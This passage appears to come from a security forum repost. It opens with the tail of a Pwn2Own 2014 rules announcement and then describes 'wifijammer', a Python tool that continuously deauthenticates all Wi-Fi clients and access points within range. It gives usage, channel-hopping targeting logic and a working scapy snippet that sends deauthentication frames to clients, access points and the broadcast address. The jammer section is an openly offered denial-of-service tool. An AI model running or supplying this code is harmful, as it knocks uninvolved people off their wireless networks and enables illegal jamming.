eye on the #pwn2own hashtag for more coverage. Press: Please direct all Pwn2Own or ZDI-related media inquiries to Cassy Lalan, hpesp@bm.com. (*Real-life unicorn prize subject to availability) Sursa: Pwn2Own 2014: Rules and Unicorns - PWN2OWN
-
[h=1]wifijammer[/h] Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting. Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection [h=2]Usage[/h] [h=3]Simple[/h] python wifijammer.py This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through. Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses. Sursa: https://github.com/DanMcInerney/wifijammer
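For reference, the per-target deauthentication frames described above look roughly like this in scapy; this is only a sketch, and the addresses and monitor interface name are placeholders:

from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

ap     = "aa:bb:cc:dd:ee:ff"   # example AP BSSID
client = "11:22:33:44:55:66"   # example client MAC
iface  = "mon0"                # monitor-mode interface

# client <- AP, AP <- client, and broadcast <- AP (to hit all clients of the AP)
for dst, src in [(client, ap), (ap, client), ("ff:ff:ff:ff:ff:ff", ap)]:
    pkt = RadioTap() / Dot11(addr1=dst, addr2=src, addr3=ap) / Dot11Deauth(reason=7)
    sendp(pkt, iface=iface, count=1, verbose=False)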